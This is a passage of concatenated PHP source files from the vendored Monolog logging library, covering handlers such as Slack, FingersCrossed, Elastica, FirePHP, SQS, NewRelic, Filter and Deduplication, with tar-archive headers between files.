$connectionTimeout = null, ?int $chunkSize = null ) { if (!extension_loaded('openssl')) { throw new MissingExtensionException('The OpenSSL PHP extension is required to use the SlackHandler'); } parent::__construct( 'ssl://slack.com:443', $level, $bubble, $persistent, $timeout, $writingTimeout, $connectionTimeout, $chunkSize ); $this->slackRecord = new SlackRecord( $channel, $username, $useAttachment, $iconEmoji, $useShortAttachment, $includeContextAndExtra, $excludeFields ); $this->token = $token; } public function getSlackRecord(): SlackRecord { return $this->slackRecord; } public function getToken(): string { return $this->token; } /** * {@inheritDoc} */ protected function generateDataStream(array $record): string { $content = $this->buildContent($record); return $this->buildHeader($content) . $content; } /** * Builds the body of API call * * @phpstan-param FormattedRecord $record */ private function buildContent(array $record): string { $dataArray = $this->prepareContentData($record); return http_build_query($dataArray); } /** * @phpstan-param FormattedRecord $record * @return string[] */ protected function prepareContentData(array $record): array { $dataArray = $this->slackRecord->getSlackData($record); $dataArray['token'] = $this->token; if (!empty($dataArray['attachments'])) { $dataArray['attachments'] = Utils::jsonEncode($dataArray['attachments']); } return $dataArray; } /** * Builds the header of the API Call */ private function buildHeader(string $content): string { $header = "POST /api/chat.postMessage HTTP/1.1\r\n"; $header .= "Host: slack.com\r\n"; $header .= "Content-Type: application/x-www-form-urlencoded\r\n"; $header .= "Content-Length: " . strlen($content) . "\r\n"; $header .= "\r\n"; return $header; } /** * {@inheritDoc} */ protected function write(array $record): void { parent::write($record); $this->finalizeWrite(); } /** * Finalizes the request by reading some bytes and then closing the socket * * If we do not read some but close the socket too early, slack sometimes * drops the request entirely. */ protected function finalizeWrite(): void { $res = $this->getResource(); if (is_resource($res)) { @fread($res, 2048); } $this->closeSocket(); } public function setFormatter(FormatterInterface $formatter): HandlerInterface { parent::setFormatter($formatter); $this->slackRecord->setFormatter($formatter); return $this; } public function getFormatter(): FormatterInterface { $formatter = parent::getFormatter(); $this->slackRecord->setFormatter($formatter); return $formatter; } /** * Channel used by the bot when posting */ public function setChannel(string $channel): self { $this->slackRecord->setChannel($channel); return $this; } /** * Username used by the bot when posting */ public function setUsername(string $username): self { $this->slackRecord->setUsername($username); return $this; } public function useAttachment(bool $useAttachment): self { $this->slackRecord->useAttachment($useAttachment); return $this; } public function setIconEmoji(string $iconEmoji): self { $this->slackRecord->setUserIcon($iconEmoji); return $this; } public function useShortAttachment(bool $useShortAttachment): self { $this->slackRecord->useShortAttachment($useShortAttachment); return $this; } public function includeContextAndExtra(bool $includeContextAndExtra): self { $this->slackRecord->includeContextAndExtra($includeContextAndExtra); return $this; } /** * @param string[] $excludeFields */ public function excludeFields(array $excludeFields): self { $this->slackRecord->excludeFields($excludeFields); return $this; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FingersCrossedHandler.php000064400000020425147600400120023712 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Handler\FingersCrossed\ErrorLevelActivationStrategy; use Monolog\Handler\FingersCrossed\ActivationStrategyInterface; use Monolog\Logger; use Monolog\ResettableInterface; use Monolog\Formatter\FormatterInterface; use Psr\Log\LogLevel; /** * Buffers all records until a certain level is reached * * The advantage of this approach is that you don't get any clutter in your log files. * Only requests which actually trigger an error (or whatever your actionLevel is) will be * in the logs, but they will contain all records, not only those above the level threshold. * * You can then have a passthruLevel as well which means that at the end of the request, * even if it did not get activated, it will still send through log records of e.g. at least a * warning level. * * You can find the various activation strategies in the * Monolog\Handler\FingersCrossed\ namespace. * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class FingersCrossedHandler extends Handler implements ProcessableHandlerInterface, ResettableInterface, FormattableHandlerInterface { use ProcessableHandlerTrait; /** * @var callable|HandlerInterface * @phpstan-var callable(?Record, HandlerInterface): HandlerInterface|HandlerInterface */ protected $handler; /** @var ActivationStrategyInterface */ protected $activationStrategy; /** @var bool */ protected $buffering = true; /** @var int */ protected $bufferSize; /** @var Record[] */ protected $buffer = []; /** @var bool */ protected $stopBuffering; /** * @var ?int * @phpstan-var ?Level */ protected $passthruLevel; /** @var bool */ protected $bubble; /** * @psalm-param HandlerInterface|callable(?Record, HandlerInterface): HandlerInterface $handler * * @param callable|HandlerInterface $handler Handler or factory callable($record|null, $fingersCrossedHandler). * @param int|string|ActivationStrategyInterface $activationStrategy Strategy which determines when this handler takes action, or a level name/value at which the handler is activated * @param int $bufferSize How many entries should be buffered at most, beyond that the oldest items are removed from the buffer. * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * @param bool $stopBuffering Whether the handler should stop buffering after being triggered (default true) * @param int|string $passthruLevel Minimum level to always flush to handler on close, even if strategy not triggered * * @phpstan-param Level|LevelName|LogLevel::* $passthruLevel * @phpstan-param Level|LevelName|LogLevel::*|ActivationStrategyInterface $activationStrategy */ public function __construct($handler, $activationStrategy = null, int $bufferSize = 0, bool $bubble = true, bool $stopBuffering = true, $passthruLevel = null) { if (null === $activationStrategy) { $activationStrategy = new ErrorLevelActivationStrategy(Logger::WARNING); } // convert simple int activationStrategy to an object if (!$activationStrategy instanceof ActivationStrategyInterface) { $activationStrategy = new ErrorLevelActivationStrategy($activationStrategy); } $this->handler = $handler; $this->activationStrategy = $activationStrategy; $this->bufferSize = $bufferSize; $this->bubble = $bubble; $this->stopBuffering = $stopBuffering; if ($passthruLevel !== null) { $this->passthruLevel = Logger::toMonologLevel($passthruLevel); } if (!$this->handler instanceof HandlerInterface && !is_callable($this->handler)) { throw new \RuntimeException("The given handler (".json_encode($this->handler).") is not a callable nor a Monolog\Handler\HandlerInterface object"); } } /** * {@inheritDoc} */ public function isHandling(array $record): bool { return true; } /** * Manually activate this logger regardless of the activation strategy */ public function activate(): void { if ($this->stopBuffering) { $this->buffering = false; } $this->getHandler(end($this->buffer) ?: null)->handleBatch($this->buffer); $this->buffer = []; } /** * {@inheritDoc} */ public function handle(array $record): bool { if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } if ($this->buffering) { $this->buffer[] = $record; if ($this->bufferSize > 0 && count($this->buffer) > $this->bufferSize) { array_shift($this->buffer); } if ($this->activationStrategy->isHandlerActivated($record)) { $this->activate(); } } else { $this->getHandler($record)->handle($record); } return false === $this->bubble; } /** * {@inheritDoc} */ public function close(): void { $this->flushBuffer(); $this->getHandler()->close(); } public function reset() { $this->flushBuffer(); $this->resetProcessors(); if ($this->getHandler() instanceof ResettableInterface) { $this->getHandler()->reset(); } } /** * Clears the buffer without flushing any messages down to the wrapped handler. * * It also resets the handler to its initial buffering state. */ public function clear(): void { $this->buffer = []; $this->reset(); } /** * Resets the state of the handler. Stops forwarding records to the wrapped handler. */ private function flushBuffer(): void { if (null !== $this->passthruLevel) { $level = $this->passthruLevel; $this->buffer = array_filter($this->buffer, function ($record) use ($level) { return $record['level'] >= $level; }); if (count($this->buffer) > 0) { $this->getHandler(end($this->buffer))->handleBatch($this->buffer); } } $this->buffer = []; $this->buffering = true; } /** * Return the nested handler * * If the handler was provided as a factory callable, this will trigger the handler's instantiation. * * @return HandlerInterface * * @phpstan-param Record $record */ public function getHandler(array $record = null) { if (!$this->handler instanceof HandlerInterface) { $this->handler = ($this->handler)($record, $this); if (!$this->handler instanceof HandlerInterface) { throw new \RuntimeException("The factory callable should return a HandlerInterface"); } } return $this->handler; } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { $handler = $this->getHandler(); if ($handler instanceof FormattableHandlerInterface) { $handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type '.get_class($handler).' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter(): FormatterInterface { $handler = $this->getHandler(); if ($handler instanceof FormattableHandlerInterface) { return $handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type '.get_class($handler).' does not support formatters.'); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/ElasticaHandler.php000064400000006400147600400120022514 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Elastica\Document; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\ElasticaFormatter; use Monolog\Logger; use Elastica\Client; use Elastica\Exception\ExceptionInterface; /** * Elastic Search handler * * Usage example: * * $client = new \Elastica\Client(); * $options = array( * 'index' => 'elastic_index_name', * 'type' => 'elastic_doc_type', Types have been removed in Elastica 7 * ); * $handler = new ElasticaHandler($client, $options); * $log = new Logger('application'); * $log->pushHandler($handler); * * @author Jelle Vink */ class ElasticaHandler extends AbstractProcessingHandler { /** * @var Client */ protected $client; /** * @var mixed[] Handler config options */ protected $options = []; /** * @param Client $client Elastica Client object * @param mixed[] $options Handler configuration */ public function __construct(Client $client, array $options = [], $level = Logger::DEBUG, bool $bubble = true) { parent::__construct($level, $bubble); $this->client = $client; $this->options = array_merge( [ 'index' => 'monolog', // Elastic index name 'type' => 'record', // Elastic document type 'ignore_error' => false, // Suppress Elastica exceptions ], $options ); } /** * {@inheritDoc} */ protected function write(array $record): void { $this->bulkSend([$record['formatted']]); } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { if ($formatter instanceof ElasticaFormatter) { return parent::setFormatter($formatter); } throw new \InvalidArgumentException('ElasticaHandler is only compatible with ElasticaFormatter'); } /** * @return mixed[] */ public function getOptions(): array { return $this->options; } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new ElasticaFormatter($this->options['index'], $this->options['type']); } /** * {@inheritDoc} */ public function handleBatch(array $records): void { $documents = $this->getFormatter()->formatBatch($records); $this->bulkSend($documents); } /** * Use Elasticsearch bulk API to send list of documents * * @param Document[] $documents * * @throws \RuntimeException */ protected function bulkSend(array $documents): void { try { $this->client->addDocuments($documents); } catch (ExceptionInterface $e) { if (!$this->options['ignore_error']) { throw new \RuntimeException("Error sending messages to Elasticsearch", 0, $e); } } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FormattableHandlerInterface.php000064400000001515147600400120025052 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; /** * Interface to describe loggers that have a formatter * * @author Jordi Boggiano */ interface FormattableHandlerInterface { /** * Sets the formatter. * * @param FormatterInterface $formatter * @return HandlerInterface self */ public function setFormatter(FormatterInterface $formatter): HandlerInterface; /** * Gets the formatter. * * @return FormatterInterface */ public function getFormatter(): FormatterInterface; } google-api/vendor/monolog/monolog/src/Monolog/Handler/MissingExtensionException.php000064400000000731147600400120024657 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; /** * Exception can be thrown if an extension for a handler is missing * * @author Christian Bergau */ class MissingExtensionException extends \Exception { } google-api/vendor/monolog/monolog/src/Monolog/Handler/ZendMonitorHandler.php000064400000006101147600400120023235 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\NormalizerFormatter; use Monolog\Logger; /** * Handler sending logs to Zend Monitor * * @author Christian Bergau * @author Jason Davis * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class ZendMonitorHandler extends AbstractProcessingHandler { /** * Monolog level / ZendMonitor Custom Event priority map * * @var array */ protected $levelMap = []; /** * @throws MissingExtensionException */ public function __construct($level = Logger::DEBUG, bool $bubble = true) { if (!function_exists('zend_monitor_custom_event')) { throw new MissingExtensionException( 'You must have Zend Server installed with Zend Monitor enabled in order to use this handler' ); } //zend monitor constants are not defined if zend monitor is not enabled. $this->levelMap = [ Logger::DEBUG => \ZEND_MONITOR_EVENT_SEVERITY_INFO, Logger::INFO => \ZEND_MONITOR_EVENT_SEVERITY_INFO, Logger::NOTICE => \ZEND_MONITOR_EVENT_SEVERITY_INFO, Logger::WARNING => \ZEND_MONITOR_EVENT_SEVERITY_WARNING, Logger::ERROR => \ZEND_MONITOR_EVENT_SEVERITY_ERROR, Logger::CRITICAL => \ZEND_MONITOR_EVENT_SEVERITY_ERROR, Logger::ALERT => \ZEND_MONITOR_EVENT_SEVERITY_ERROR, Logger::EMERGENCY => \ZEND_MONITOR_EVENT_SEVERITY_ERROR, ]; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { $this->writeZendMonitorCustomEvent( Logger::getLevelName($record['level']), $record['message'], $record['formatted'], $this->levelMap[$record['level']] ); } /** * Write to Zend Monitor Events * @param string $type Text displayed in "Class Name (custom)" field * @param string $message Text displayed in "Error String" * @param array $formatted Displayed in Custom Variables tab * @param int $severity Set the event severity level (-1,0,1) * * @phpstan-param FormattedRecord $formatted */ protected function writeZendMonitorCustomEvent(string $type, string $message, array $formatted, int $severity): void { zend_monitor_custom_event($type, $message, $formatted, $severity); } /** * {@inheritDoc} */ public function getDefaultFormatter(): FormatterInterface { return new NormalizerFormatter(); } /** * @return array */ public function getLevelMap(): array { return $this->levelMap; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FirePHPHandler.php000064400000012250147600400120022224 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\WildfireFormatter; use Monolog\Formatter\FormatterInterface; /** * Simple FirePHP Handler (http://www.firephp.org/), which uses the Wildfire protocol. * * @author Eric Clemmons (@ericclemmons) * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class FirePHPHandler extends AbstractProcessingHandler { use WebRequestRecognizerTrait; /** * WildFire JSON header message format */ protected const PROTOCOL_URI = 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2'; /** * FirePHP structure for parsing messages & their presentation */ protected const STRUCTURE_URI = 'http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1'; /** * Must reference a "known" plugin, otherwise headers won't display in FirePHP */ protected const PLUGIN_URI = 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3'; /** * Header prefix for Wildfire to recognize & parse headers */ protected const HEADER_PREFIX = 'X-Wf'; /** * Whether or not Wildfire vendor-specific headers have been generated & sent yet * @var bool */ protected static $initialized = false; /** * Shared static message index between potentially multiple handlers * @var int */ protected static $messageIndex = 1; /** @var bool */ protected static $sendHeaders = true; /** * Base header creation function used by init headers & record headers * * @param array $meta Wildfire Plugin, Protocol & Structure Indexes * @param string $message Log message * * @return array Complete header string ready for the client as key and message as value * * @phpstan-return non-empty-array */ protected function createHeader(array $meta, string $message): array { $header = sprintf('%s-%s', static::HEADER_PREFIX, join('-', $meta)); return [$header => $message]; } /** * Creates message header from record * * @return array * * @phpstan-return non-empty-array * * @see createHeader() * * @phpstan-param FormattedRecord $record */ protected function createRecordHeader(array $record): array { // Wildfire is extensible to support multiple protocols & plugins in a single request, // but we're not taking advantage of that (yet), so we're using "1" for simplicity's sake. return $this->createHeader( [1, 1, 1, self::$messageIndex++], $record['formatted'] ); } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new WildfireFormatter(); } /** * Wildfire initialization headers to enable message parsing * * @see createHeader() * @see sendHeader() * * @return array */ protected function getInitHeaders(): array { // Initial payload consists of required headers for Wildfire return array_merge( $this->createHeader(['Protocol', 1], static::PROTOCOL_URI), $this->createHeader([1, 'Structure', 1], static::STRUCTURE_URI), $this->createHeader([1, 'Plugin', 1], static::PLUGIN_URI) ); } /** * Send header string to the client */ protected function sendHeader(string $header, string $content): void { if (!headers_sent() && self::$sendHeaders) { header(sprintf('%s: %s', $header, $content)); } } /** * Creates & sends header for a record, ensuring init headers have been sent prior * * @see sendHeader() * @see sendInitHeaders() */ protected function write(array $record): void { if (!self::$sendHeaders || !$this->isWebRequest()) { return; } // WildFire-specific headers must be sent prior to any messages if (!self::$initialized) { self::$initialized = true; self::$sendHeaders = $this->headersAccepted(); if (!self::$sendHeaders) { return; } foreach ($this->getInitHeaders() as $header => $content) { $this->sendHeader($header, $content); } } $header = $this->createRecordHeader($record); if (trim(current($header)) !== '') { $this->sendHeader(key($header), current($header)); } } /** * Verifies if the headers are accepted by the current user agent */ protected function headersAccepted(): bool { if (!empty($_SERVER['HTTP_USER_AGENT']) && preg_match('{\bFirePHP/\d+\.\d+\b}', $_SERVER['HTTP_USER_AGENT'])) { return true; } return isset($_SERVER['HTTP_X_FIREPHP_VERSION']); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/WebRequestRecognizerTrait.php000064400000001014147600400120024607 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; trait WebRequestRecognizerTrait { /** * Checks if PHP's serving a web request * @return bool */ protected function isWebRequest(): bool { return 'cli' !== \PHP_SAPI && 'phpdbg' !== \PHP_SAPI; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SqsHandler.php000064400000003322147600400120021535 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Aws\Sqs\SqsClient; use Monolog\Logger; use Monolog\Utils; /** * Writes to any sqs queue. * * @author Martijn van Calker */ class SqsHandler extends AbstractProcessingHandler { /** 256 KB in bytes - maximum message size in SQS */ protected const MAX_MESSAGE_SIZE = 262144; /** 100 KB in bytes - head message size for new error log */ protected const HEAD_MESSAGE_SIZE = 102400; /** @var SqsClient */ private $client; /** @var string */ private $queueUrl; public function __construct(SqsClient $sqsClient, string $queueUrl, $level = Logger::DEBUG, bool $bubble = true) { parent::__construct($level, $bubble); $this->client = $sqsClient; $this->queueUrl = $queueUrl; } /** * {@inheritDoc} */ protected function write(array $record): void { if (!isset($record['formatted']) || 'string' !== gettype($record['formatted'])) { throw new \InvalidArgumentException('SqsHandler accepts only formatted records as a string' . Utils::getRecordMessageForException($record)); } $messageBody = $record['formatted']; if (strlen($messageBody) >= static::MAX_MESSAGE_SIZE) { $messageBody = Utils::substr($messageBody, 0, static::HEAD_MESSAGE_SIZE); } $this->client->sendMessage([ 'QueueUrl' => $this->queueUrl, 'MessageBody' => $messageBody, ]); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/NewRelicHandler.php000064400000014103147600400120022476 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; use Monolog\Formatter\NormalizerFormatter; use Monolog\Formatter\FormatterInterface; /** * Class to record a log on a NewRelic application. * Enabling New Relic High Security mode may prevent capture of useful information. * * This handler requires a NormalizerFormatter to function and expects an array in $record['formatted'] * * @see https://docs.newrelic.com/docs/agents/php-agent * @see https://docs.newrelic.com/docs/accounts-partnerships/accounts/security/high-security */ class NewRelicHandler extends AbstractProcessingHandler { /** * Name of the New Relic application that will receive logs from this handler. * * @var ?string */ protected $appName; /** * Name of the current transaction * * @var ?string */ protected $transactionName; /** * Some context and extra data is passed into the handler as arrays of values. Do we send them as is * (useful if we are using the API), or explode them for display on the NewRelic RPM website? * * @var bool */ protected $explodeArrays; /** * {@inheritDoc} * * @param string|null $appName * @param bool $explodeArrays * @param string|null $transactionName */ public function __construct( $level = Logger::ERROR, bool $bubble = true, ?string $appName = null, bool $explodeArrays = false, ?string $transactionName = null ) { parent::__construct($level, $bubble); $this->appName = $appName; $this->explodeArrays = $explodeArrays; $this->transactionName = $transactionName; } /** * {@inheritDoc} */ protected function write(array $record): void { if (!$this->isNewRelicEnabled()) { throw new MissingExtensionException('The newrelic PHP extension is required to use the NewRelicHandler'); } if ($appName = $this->getAppName($record['context'])) { $this->setNewRelicAppName($appName); } if ($transactionName = $this->getTransactionName($record['context'])) { $this->setNewRelicTransactionName($transactionName); unset($record['formatted']['context']['transaction_name']); } if (isset($record['context']['exception']) && $record['context']['exception'] instanceof \Throwable) { newrelic_notice_error($record['message'], $record['context']['exception']); unset($record['formatted']['context']['exception']); } else { newrelic_notice_error($record['message']); } if (isset($record['formatted']['context']) && is_array($record['formatted']['context'])) { foreach ($record['formatted']['context'] as $key => $parameter) { if (is_array($parameter) && $this->explodeArrays) { foreach ($parameter as $paramKey => $paramValue) { $this->setNewRelicParameter('context_' . $key . '_' . $paramKey, $paramValue); } } else { $this->setNewRelicParameter('context_' . $key, $parameter); } } } if (isset($record['formatted']['extra']) && is_array($record['formatted']['extra'])) { foreach ($record['formatted']['extra'] as $key => $parameter) { if (is_array($parameter) && $this->explodeArrays) { foreach ($parameter as $paramKey => $paramValue) { $this->setNewRelicParameter('extra_' . $key . '_' . $paramKey, $paramValue); } } else { $this->setNewRelicParameter('extra_' . $key, $parameter); } } } } /** * Checks whether the NewRelic extension is enabled in the system. * * @return bool */ protected function isNewRelicEnabled(): bool { return extension_loaded('newrelic'); } /** * Returns the appname where this log should be sent. Each log can override the default appname, set in this * handler's constructor, by providing the appname in it's context. * * @param mixed[] $context */ protected function getAppName(array $context): ?string { if (isset($context['appname'])) { return $context['appname']; } return $this->appName; } /** * Returns the name of the current transaction. Each log can override the default transaction name, set in this * handler's constructor, by providing the transaction_name in it's context * * @param mixed[] $context */ protected function getTransactionName(array $context): ?string { if (isset($context['transaction_name'])) { return $context['transaction_name']; } return $this->transactionName; } /** * Sets the NewRelic application that should receive this log. */ protected function setNewRelicAppName(string $appName): void { newrelic_set_appname($appName); } /** * Overwrites the name of the current transaction */ protected function setNewRelicTransactionName(string $transactionName): void { newrelic_name_transaction($transactionName); } /** * @param string $key * @param mixed $value */ protected function setNewRelicParameter(string $key, $value): void { if (null === $value || is_scalar($value)) { newrelic_add_custom_parameter($key, $value); } else { newrelic_add_custom_parameter($key, Utils::jsonEncode($value, null, true)); } } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new NormalizerFormatter(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/FilterHandler.php000064400000015317147600400120022223 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\ResettableInterface; use Monolog\Formatter\FormatterInterface; use Psr\Log\LogLevel; /** * Simple handler wrapper that filters records based on a list of levels * * It can be configured with an exact list of levels to allow, or a min/max level. * * @author Hennadiy Verkh * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class FilterHandler extends Handler implements ProcessableHandlerInterface, ResettableInterface, FormattableHandlerInterface { use ProcessableHandlerTrait; /** * Handler or factory callable($record, $this) * * @var callable|HandlerInterface * @phpstan-var callable(?Record, HandlerInterface): HandlerInterface|HandlerInterface */ protected $handler; /** * Minimum level for logs that are passed to handler * * @var int[] * @phpstan-var array */ protected $acceptedLevels; /** * Whether the messages that are handled can bubble up the stack or not * * @var bool */ protected $bubble; /** * @psalm-param HandlerInterface|callable(?Record, HandlerInterface): HandlerInterface $handler * * @param callable|HandlerInterface $handler Handler or factory callable($record|null, $filterHandler). * @param int|array $minLevelOrList A list of levels to accept or a minimum level if maxLevel is provided * @param int|string $maxLevel Maximum level to accept, only used if $minLevelOrList is not an array * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * * @phpstan-param Level|LevelName|LogLevel::*|array $minLevelOrList * @phpstan-param Level|LevelName|LogLevel::* $maxLevel */ public function __construct($handler, $minLevelOrList = Logger::DEBUG, $maxLevel = Logger::EMERGENCY, bool $bubble = true) { $this->handler = $handler; $this->bubble = $bubble; $this->setAcceptedLevels($minLevelOrList, $maxLevel); if (!$this->handler instanceof HandlerInterface && !is_callable($this->handler)) { throw new \RuntimeException("The given handler (".json_encode($this->handler).") is not a callable nor a Monolog\Handler\HandlerInterface object"); } } /** * @phpstan-return array */ public function getAcceptedLevels(): array { return array_flip($this->acceptedLevels); } /** * @param int|string|array $minLevelOrList A list of levels to accept or a minimum level or level name if maxLevel is provided * @param int|string $maxLevel Maximum level or level name to accept, only used if $minLevelOrList is not an array * * @phpstan-param Level|LevelName|LogLevel::*|array $minLevelOrList * @phpstan-param Level|LevelName|LogLevel::* $maxLevel */ public function setAcceptedLevels($minLevelOrList = Logger::DEBUG, $maxLevel = Logger::EMERGENCY): self { if (is_array($minLevelOrList)) { $acceptedLevels = array_map('Monolog\Logger::toMonologLevel', $minLevelOrList); } else { $minLevelOrList = Logger::toMonologLevel($minLevelOrList); $maxLevel = Logger::toMonologLevel($maxLevel); $acceptedLevels = array_values(array_filter(Logger::getLevels(), function ($level) use ($minLevelOrList, $maxLevel) { return $level >= $minLevelOrList && $level <= $maxLevel; })); } $this->acceptedLevels = array_flip($acceptedLevels); return $this; } /** * {@inheritDoc} */ public function isHandling(array $record): bool { return isset($this->acceptedLevels[$record['level']]); } /** * {@inheritDoc} */ public function handle(array $record): bool { if (!$this->isHandling($record)) { return false; } if ($this->processors) { /** @var Record $record */ $record = $this->processRecord($record); } $this->getHandler($record)->handle($record); return false === $this->bubble; } /** * {@inheritDoc} */ public function handleBatch(array $records): void { $filtered = []; foreach ($records as $record) { if ($this->isHandling($record)) { $filtered[] = $record; } } if (count($filtered) > 0) { $this->getHandler($filtered[count($filtered) - 1])->handleBatch($filtered); } } /** * Return the nested handler * * If the handler was provided as a factory callable, this will trigger the handler's instantiation. * * @return HandlerInterface * * @phpstan-param Record $record */ public function getHandler(array $record = null) { if (!$this->handler instanceof HandlerInterface) { $this->handler = ($this->handler)($record, $this); if (!$this->handler instanceof HandlerInterface) { throw new \RuntimeException("The factory callable should return a HandlerInterface"); } } return $this->handler; } /** * {@inheritDoc} */ public function setFormatter(FormatterInterface $formatter): HandlerInterface { $handler = $this->getHandler(); if ($handler instanceof FormattableHandlerInterface) { $handler->setFormatter($formatter); return $this; } throw new \UnexpectedValueException('The nested handler of type '.get_class($handler).' does not support formatters.'); } /** * {@inheritDoc} */ public function getFormatter(): FormatterInterface { $handler = $this->getHandler(); if ($handler instanceof FormattableHandlerInterface) { return $handler->getFormatter(); } throw new \UnexpectedValueException('The nested handler of type '.get_class($handler).' does not support formatters.'); } public function reset() { $this->resetProcessors(); if ($this->getHandler() instanceof ResettableInterface) { $this->getHandler()->reset(); } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/DeduplicationHandler.php000064400000013657147600400120023567 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Psr\Log\LogLevel; /** * Simple handler wrapper that deduplicates log records across multiple requests * * It also includes the BufferHandler functionality and will buffer * all messages until the end of the request or flush() is called. * * This works by storing all log records' messages above $deduplicationLevel * to the file specified by $deduplicationStore. When further logs come in at the end of the * request (or when flush() is called), all those above $deduplicationLevel are checked * against the existing stored logs. If they match and the timestamps in the stored log is * not older than $time seconds, the new log record is discarded. If no log record is new, the * whole data set is discarded. * * This is mainly useful in combination with Mail handlers or things like Slack or HipChat handlers * that send messages to people, to avoid spamming with the same message over and over in case of * a major component failure like a database server being down which makes all requests fail in the * same way. * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger * @phpstan-import-type Level from \Monolog\Logger */ class DeduplicationHandler extends BufferHandler { /** * @var string */ protected $deduplicationStore; /** * @var Level */ protected $deduplicationLevel; /** * @var int */ protected $time; /** * @var bool */ private $gc = false; /** * @param HandlerInterface $handler Handler. * @param string $deduplicationStore The file/path where the deduplication log should be kept * @param string|int $deduplicationLevel The minimum logging level for log records to be looked at for deduplication purposes * @param int $time The period (in seconds) during which duplicate entries should be suppressed after a given log is sent through * @param bool $bubble Whether the messages that are handled can bubble up the stack or not * * @phpstan-param Level|LevelName|LogLevel::* $deduplicationLevel */ public function __construct(HandlerInterface $handler, ?string $deduplicationStore = null, $deduplicationLevel = Logger::ERROR, int $time = 60, bool $bubble = true) { parent::__construct($handler, 0, Logger::DEBUG, $bubble, false); $this->deduplicationStore = $deduplicationStore === null ? sys_get_temp_dir() . '/monolog-dedup-' . substr(md5(__FILE__), 0, 20) .'.log' : $deduplicationStore; $this->deduplicationLevel = Logger::toMonologLevel($deduplicationLevel); $this->time = $time; } public function flush(): void { if ($this->bufferSize === 0) { return; } $passthru = null; foreach ($this->buffer as $record) { if ($record['level'] >= $this->deduplicationLevel) { $passthru = $passthru || !$this->isDuplicate($record); if ($passthru) { $this->appendRecord($record); } } } // default of null is valid as well as if no record matches duplicationLevel we just pass through if ($passthru === true || $passthru === null) { $this->handler->handleBatch($this->buffer); } $this->clear(); if ($this->gc) { $this->collectLogs(); } } /** * @phpstan-param Record $record */ private function isDuplicate(array $record): bool { if (!file_exists($this->deduplicationStore)) { return false; } $store = file($this->deduplicationStore, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if (!is_array($store)) { return false; } $yesterday = time() - 86400; $timestampValidity = $record['datetime']->getTimestamp() - $this->time; $expectedMessage = preg_replace('{[\r\n].*}', '', $record['message']); for ($i = count($store) - 1; $i >= 0; $i--) { list($timestamp, $level, $message) = explode(':', $store[$i], 3); if ($level === $record['level_name'] && $message === $expectedMessage && $timestamp > $timestampValidity) { return true; } if ($timestamp < $yesterday) { $this->gc = true; } } return false; } private function collectLogs(): void { if (!file_exists($this->deduplicationStore)) { return; } $handle = fopen($this->deduplicationStore, 'rw+'); if (!$handle) { throw new \RuntimeException('Failed to open file for reading and writing: ' . $this->deduplicationStore); } flock($handle, LOCK_EX); $validLogs = []; $timestampValidity = time() - $this->time; while (!feof($handle)) { $log = fgets($handle); if ($log && substr($log, 0, 10) >= $timestampValidity) { $validLogs[] = $log; } } ftruncate($handle, 0); rewind($handle); foreach ($validLogs as $log) { fwrite($handle, $log); } flock($handle, LOCK_UN); fclose($handle); $this->gc = false; } /** * @phpstan-param Record $record */ private function appendRecord(array $record): void { file_put_contents($this->deduplicationStore, $record['datetime']->getTimestamp() 